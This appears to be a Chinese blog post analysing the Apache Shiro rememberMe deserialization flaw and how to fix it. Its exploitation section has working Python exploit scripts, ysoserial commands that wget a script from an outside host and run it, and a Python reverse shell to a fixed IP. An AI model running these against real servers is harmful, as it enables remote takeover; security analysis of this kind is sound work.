Apache Shiro Java反序列化漏洞分析

最新推荐文章于 2023-10-18 13:46:18 发布
最新推荐文章于 2023-10-18 13:46:18 发布
阅读量489 收藏 2
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77512689/article/details/130222252
版权

1. 前言

最近工作上刚好碰到了这个漏洞,当时的漏洞环境是:

  • shiro-core 1.2.4
  • commons-beanutils 1.9.1

最终利用ysoserial的CommonsBeanutils1命令执行。

虽然在ysoserial里CommonsBeanutils1类的版本为1.9.2,不过上面环境测试确实可以命令执行。

CommonsBeanutils1   @frohoff  commons-beanutils:1.9.2

这里当时有一个问题是:如何获取Java里引用组件的版本?

大多数的时候,我们只要解析pom.xml就能解析出相应组件的版本。但有的情况下,并不能获取组件的版本。比如有的pom.xml并没有设置组件的version版本,没有设置version的情况,是由依赖决定。项目中依赖了A,A依赖了B,B的版本由A决定;又或者漏洞组件A是在组件B里引用的,pom.xml里并没有组件A的配置。为了解决这个问题,我们可以用mvn dependency:tree命令获取所有组件调用关系,或者使用mvn dependency:list命令获取所有组件,只是没有调用关系。

2. 漏洞影响

只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。

3. 环境搭建

漏洞的测试环境,可以用docker搭建,有人已经写好了。

搭建完成后,docker exec -it your_docker_id /bin/bash进入该docker的tomcat lib目录/usr/local/tomcat/webapps/ROOT/WEB-INF/lib,看到造成漏洞的jar包为:

  • shiro-core-1.2.4.jar
  • commons-collections4-4.0.jar (为了进行命令执行的测试,额外添加的版本)

或者如果想动态调试,可以根据Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞这篇文章自己搭建环境。不过文中并没有说如何动态调试。我描述下如何在IDEA中动态调试shiro,这里感谢@lightless指点,其实就是在IDEA中添加Tomcat运行。相关步骤如下:

Run -> Edit Configurations -> 添加TomcatServer(Local) -> Server中配置Tomcat路径 -> Deployment中添加Artifact选择sample-web:war exploded

4. 漏洞分析

先看下官网漏洞说明:[SHIRO-550] Randomize default remember me cipher - ASF JIRA

Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。

Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行 序列化、AES加密、Base64编码操作。

在识别身份的时候,需要对Cookie里的rememberMe字段解密。根据加密的顺序,不难知道解密的顺序为:

  • 获取rememberMe cookie
  • base64 decode
  • 解密AES
  • 反序列化

但是,AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。

4.1 加密

先来看看如何进行加密。

登录http://localhost:8080/login.jsp,勾选rememberMe,登录成功后,看到一个key为rememberMe,value长度为512的cookie。

NMhQ5j+uiYfUA+gQF93wGknW88ru39LFDKiOmaAuphx7h+r/XUhlebml7+KNwfF0gIIOnJg6LA8xVpzPJTYknq/aYPeeDNJEVYX8DSUMNUh0nbCdHW1YNuFDdBNg6chk5nEZwkh7dG9k+uAnZEfpFbRTajQ4vEolbOktGAS+feNmpurL2P/0dpWwzsSGMZubiVs0ICMVt6CS3qvU8rKC22lbPILSqTiD5Ao+6YNCm19qm/6uQ7De2E+gmKmxGA9o/EsaRUE71wdiHdJbaDeNOQ5am8rXiejqtfEl5YHzeU2MEdxqo+POVUgaSal7O3FYhLjfn4U1nS97/VUHfY7mlz3iP9rU4KvIYjtB5RhbNwkgoFmtUY6MFyFaJNoOAwKBfkeVY0w7QoF7zo0P1HEA3G1XEBR7GeC4O/XAChMnDx7NYfm5D5RZuWWNkW8qI0U9n5UJXmpVsS1hB3vor0eB/5gO5USMy+ToHAW3bOB6REK1x3/U9IS82sY/aLv7aXBA

从官网中,我们知道处理Cookie的类是CookieRememberMeManaer,该类继承AbstractRememberMeManager类,跟进AbstractRememberMeManager类,很容易看到AES的key。

private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");

最简单的调试方法,随意登录一个账号,勾选rememberMe按钮,在AbstractRememberMeManager类的onSuccessfulLogin方法下断点,慢慢debug,所有逻辑就会明白了。

假设我们以root的用户名的登录了。如果登录成功,shiro先将登录的用户名root字符串进行序列化,使用DefaultSerializer类的serialize方法。

protected byte[] convertPrincipalsToBytes(PrincipalCollection principals) {
        byte[] bytes = serialize(principals); // 进行序列化
        if (getCipherService() != null) {
            bytes = encrypt(bytes); // AES加密
        }
        return bytes;
    }

接着进行AES加密。动态跟踪到AbstractRememberMeManager类的encrypt方法中,可以看到AES的模式为AES/CBC/PKCS5Padding,并且AES的key为Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="),转换为16进制后是\x90\xf1\xfe\x6c\x8c\x64\xe4\x3d\x9d\x79\x98\x88\xc5\xc6\x9a\x68,key为16字节,128位。

protected byte[] encrypt(byte[] serialized) {
        byte[] value = serialized;
        CipherService cipherService = getCipherService();
        if (cipherService != null) {
            ByteSource byteSource = cipherService.encrypt(serialized, getEncryptionCipherKey());
            value = byteSource.getBytes();
        }
        return value;
    }

进行AES加密,利用arraycopy()方法将随机的16字节IV放到序列化后的数据前面,完成后再进行AES加密。

最后在CookieRememberMeManager类的rememberSerializedIdentity()方法中进行base64加密:

String base64 = Base64.encodeToString(serialized);

4.2 解密

有了AES的key、加密模式AES/CBC/PKCS5Padding,由于AES是对称加密,所以我们已经可以解密AES的密文了。

第一步:获取rememberMe的Cookie

第二步:base64解码。CookieRememberMeManager类的getRememberedSerializedIdentity()方法

byte[] decoded = Base64.decode(base64);

第三步:AES解密。base64解码后的字节,减去前面16个字节。

AbstractRememberMeManager类的decrypt()方法


    protected byte[] decrypt(byte[] encrypted) {
        byte[] serialized = encrypted;
        CipherService cipherService = getCipherService();
        if (cipherService != null) {
            ByteSource byteSource = cipherService.decrypt(encrypted, getDecryptionCipherKey());
            serialized = byteSource.getBytes();
        }
        return serialized;
    }

第四步:反序列化。DefaultSerializer类的deserialize()方法


    public T deserialize(byte[] serialized) throws SerializationException {
        if (serialized == null) {
            String msg = "argument cannot be null.";
            throw new IllegalArgumentException(msg);
        }
        ByteArrayInputStream bais = new ByteArrayInputStream(serialized);
        BufferedInputStream bis = new BufferedInputStream(bais);
        try {
            ObjectInputStream ois = new ClassResolvingObjectInputStream(bis);
            @SuppressWarnings({"unchecked"})
            T deserialized = (T) ois.readObject();
            ois.close();
            return deserialized;
        } catch (Exception e) {
            String msg = "Unable to deserialze argument byte array.";
            throw new SerializationException(msg, e);
        }
    }
}

可以看到,解密和加密完全是对称的。第四步中的readObject()方法,由于反序列化的对象完全由外部rememberMe Cookie控制。所以,一旦添加了有漏洞的common-collections包,就会造成任意命令执行。

5. 漏洞利用
5.1 commons-collections 4.0
针对https://github.com/Medicean/VulApps/tr

ee/master/s/shiro/1docker环境的漏洞利用比较简单。利用ysoserial的CommonsCollections2即可

import os
import re
import base64
import uuid
import subprocess
import requests
from Crypto.Cipher import AES

JAR_FILE = '/Users/Viarus/Downloads/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar'


def poc(url, rce_command):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        payload = generator(rce_command, JAR_FILE)  # 生成payload
        r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)  # 发送验证请求
        print r.text
    except Exception, e:
        pass
    return False


def generator(command, fp):
    if not os.path.exists(fp):
        raise Exception('jar file not found!')
    popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections2', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    poc('http://127.0.0.1:8080', 'open /Applications/Calculator.app')

本地成功弹计算器。

5.1 commons-collections 3.2.1

默认shiro的commons-collections版本为3.2.1,并且在ysoserial里并没有3.2.1的版本,我们利用3.2.1的payload,结果报如下错误:

java.lang.ClassNotFoundException: Unable to load ObjectStreamClass [[Lorg.apache.commons.collections.Transformer;: static final long serialVersionUID = -4803604734341277543L;]:

报错的原因是因为:

Shiro resovleClass使用的是ClassLoader.loadClass()而非Class.forName(),而ClassLoader.loadClass不支持装载数组类型的class。

当然为了证明反序列化漏洞确实存在,我们可以利用ysoserial的URLDNS gadget进行验证,参数改成dns地址,测试能收到DNS请求。不过Java默认有TTL缓存,DNS解析会进行缓存,所以可能会出现第一次收到DNS的log,后面可能收不到的情况。URLDNS gadget不需要其他类的支持,它的Gadget Chain:

 *   Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()

但是可以利用ysoserial的JRMP。具体利用过程如下:

在有外网的服务器下监控一个JRMP端口,wget为要执行的命令。

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'curl test.joychou.org'

此时执行poc,已经执行了curl test.joychou.org命令。

#coding: utf-8

import os
import re
import base64
import uuid
import subprocess
import requests
from Crypto.Cipher import AES

JAR_FILE = '/Users/Viarus/Downloads/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar'


def poc(url, rce_command):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        payload = generator(rce_command, JAR_FILE)  # 生成payload
        print payload
        print payload.decode()
        r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)  # 发送验证请求
        print r.text
    except Exception, e:
        print(e)
        pass
    return False


def generator(command, fp):
    if not os.path.exists(fp):
        raise Exception('jar file not found!')
    popen = subprocess.Popen(['java', '-jar', fp, 'JRMPClient', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


poc('http://127.0.0.1:8080', '47.52.77.204:12345')

不过如果想达到命令执行的目标,可以分别执行两条命令:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget test.joychou.org/shell.py -O /tmp/shell.py'

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'python /tmp/shell.py'
shell.py为反弹shell的代码:


import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("47.52.77.204",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

6. 漏洞修复

先说结论:无论是否升级shiro到1.2.5及以上,如果shiro的rememberMe功能的AES密钥一旦泄露,就会导致反序列化漏洞。

跟了shiro 1.3.2的代码,看到官方的操作如下:

  • 删除代码里的默认密钥
  • 默认配置里注释了默认密钥
  • 如果不配置密钥,每次会重新随机一个密钥

可以看到并没有对反序列化做安全限制,只是在逻辑上对该漏洞进行了处理。
如果在配置里自己单独配置AES的密钥,并且密钥一旦泄露,那么漏洞依然存在。

所以漏洞修复的话,我建议下面的方案同时进行:

  • 升级shiro到1.2.5及以上
  • 如果在配置里配置了密钥,那么请一定不要使用网上的密钥,一定不要!!请自己base64一个AES的密钥,或者利用官方提供的方法生成密钥:org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()

7. 总结

  • 标准的AES的加解密只跟私钥key和加密模式有关,和IV无关。
  • 为了证明反序列化漏洞确实存在,可以利用ysoserial的URLDNS gadget进行验证,但是默认会有TTL缓存机制,默认10s。

反序列化导致的命令执行需要两个点:

  1. readObject()反序列化的内容可控。
  2. 应用引用的jar包中存在可命令执行的Gadget Chain。

程序媛栀子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Shiro_exploit:Apache Shiro Java序列漏洞分析和利用
03-10
Apache Shiro Java序列进攻分析及利用 0x00项目地址 0x01概述 两者天被派去去护网&重保,态势感知报告了一条冰蝎的远程代码执行的纠正,在通过日志以及webshel​​l及相关信息,红队大概是通过shiro序列拿到主机权限,之前一大佬还特别分享过shiro序列断裂,还没来及研究就碰上了,。正好这个机会研究分析一波, 四郎用remembreme这个cookie的对用户进行鉴权,防止出现越权问题,它使用CookieRemembreMeManager这个类,对remebremecookie的键使用ObjectInputStream类进行序列,然后对字符流进行用AES加密方式对其进行的base64编码,然后返回客户端remebremeCookie ,这其实是有问题的,shiro把其实aes的密钥硬编码在代码里的类,我们可以通过ysoserial这个的Common
序列漏洞_Apache Shiro Java序列漏洞
weixin_39552768的博客
12-14 182
一、漏洞介绍Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。Shiro对rememberme的cookie做...
Shiro RememberMe 序列漏洞
hbxf_xs的博客
11-27 1973
Apache Shiro 序列漏洞 1)、Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列,然后使用aes加密,最后在使用base64编码处理形成的。 在服务端接收cookie值时,按照如下步骤来解析处理: 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行序列操作(未作
Apache Shiro Java序列漏洞(CVE-2016-4437)
qq_45300786的博客
12-25 672
我只是个无情的挂马机器,原理相信百度一大把,我就不赘述了 0x00 环境要求 靶机:192.168.100.23 攻击机:192.168.100.34 0x01 环境搭建 这里使用docker进行环境搭建: 下载 git clone https://github.com/Medicean/VulApps/tree/master/s/shiro/1 1.拉取环境到本地 $ docker pull medicean/vulapps:s_shiro_1 2.启动环境 $ docker run -d -p 8080
Apache Shiro Java 序列漏洞分析
Townmacro的博客
04-06 3853
Apache Shiro Java 序列漏洞分析
Apache shiro1.2.4序列漏洞介绍.docx
07-01
Apache shiro1.2.4序列漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次...
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Shiro序列漏洞检测工具
01-05
Shiro1.2.4及以下版本存在序列漏洞,该工具用于测试该漏洞
shiro序列漏洞暴力破解漏洞检测工具
09-14
1.shiro序列漏洞、暴力破解漏洞检测工具源码 2.shiro序列漏洞、暴力破解漏洞检测工具jar包 3.shiro序列漏洞、暴力破解漏洞检测工具启动方法 4.shiro序列漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
java序列漏洞 https服务_25. Apache Shiro Java序列漏洞
weixin_39619481的博客
02-25 145
前言:最近在审核漏洞的时候,发现尽管Apache shiro这个序列漏洞爆出来好久了,但是由于漏洞特征不明显,并且shiro这个组件之前很少听说,导致大厂很多服务还存在shiro序列漏洞,这里对漏洞进行简单分析与复现。一.漏洞前析0x01 什么是Apache ShiroApache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理...
java 漏洞复现_Apache Shiro java序列漏洞复现
weixin_42526484的博客
03-02 161
Apache Shiro java序列漏洞复现 影响版本Apache Shiro <= 1.2.4环境搭建准备环境攻击机: Windows或者Linux (我用的是windows10 1903)、ysoserial-0.0.6-SNAPSHOT-all.jar、python环境、Java环境**靶机:**带docker的Linux就行靶机环境搭建获取docker镜像docker pull...
Apache Shiro Java序列漏洞记录
mazuyu408的博客
04-10 302
最近工作上刚好碰到了这个漏洞,当时的漏洞扫描出来后一直升级shiro也没效果,最后才发现是,shiro的rememberMe功能的AES密钥一旦泄露,就会导致序列漏洞。 而无论是否升级shiro到最新版本还是什么,ShiroConfig类里面的rememberMe管理器如果没有做修改大部分都是一样的代码,所以很容易就会被攻击到。 /** * rememberMe管理器, cipherKey生成见{@code Base64Test.java} */ @Bean
Apache Shiro 组件序列漏洞分析
最新发布
why811的博客
10-18 860
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。为了让浏览器或服务器重启后用户不丢失登录状态,Shiro支持将持久信息序列并加密后保存在Cookie的rememberMe字段中,下次读取时进行解密再序列
Apache Shiro RememberMe 1.2.4 序列漏洞
ddr12231的博客
08-08 1588
拉取镜像 docker pull medicean/vulapps:s_shiro_1 启动环境 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 拉取镜像中.....呵呵 ! 网太慢,有时间再弄 转载于:https://www.cnblogs.com/mrhonest/p/11320498.html...
Apache Shiro Remember Me 序列漏洞 CVE-2016-4437 Shiro-550 漏洞复现
Senimo
04-30 2026
CVE-2016-4437 Apache Shiro Remember Me 序列漏洞一、 漏洞描述二、漏洞影响三、漏洞复现1、 环境搭建2、 漏洞复现四、漏洞POC五、参考文章 一、 漏洞描述 Apache Shiro 框架提供了记住用户功能,即 Remember Me 功能,用户登录成功后会生成经过加密编码的 Cookie。Cookie 的键为rememberMe ,值是经过对相关信息进行序列后,使用 AES 加密,最后使用 Base64 编码处理。 服务器端 Cookie 处理流程: 检索
Apache Shiro remember Me序列漏洞Shiro 550)复现
一位热爱网安的年轻人的博客
01-11 1036
Apache Shiro remember Me序列漏洞Shiro 550)复现
[CVE-2016-4437] Apache Shiro 安全框架序列漏洞复现与原理详细分析
Specif1c的博客
10-21 4666
Apache Shiro是一个强大且易用的 Java安全框架,执行身份验证、授权、密码和会话管理。shiro 相比于 springsecurity 简单许多,官方号称 10 分钟就能学会。shiro 序列漏洞Java 经典漏洞,于2016年被挖掘出来,到现在依旧很多系统存在该漏洞,非常值得学习,对加深 shiro 认证机制的理解以及java代码审计颇有帮助。
Apache Shiro 1.2.4序列漏洞(Shiro-550)--Shiro rememberMe序列漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1368
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java序列漏洞,进而在目标机器上执行任意命令。
Apache Shiro 1.2.4序列漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个序列漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接序列执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值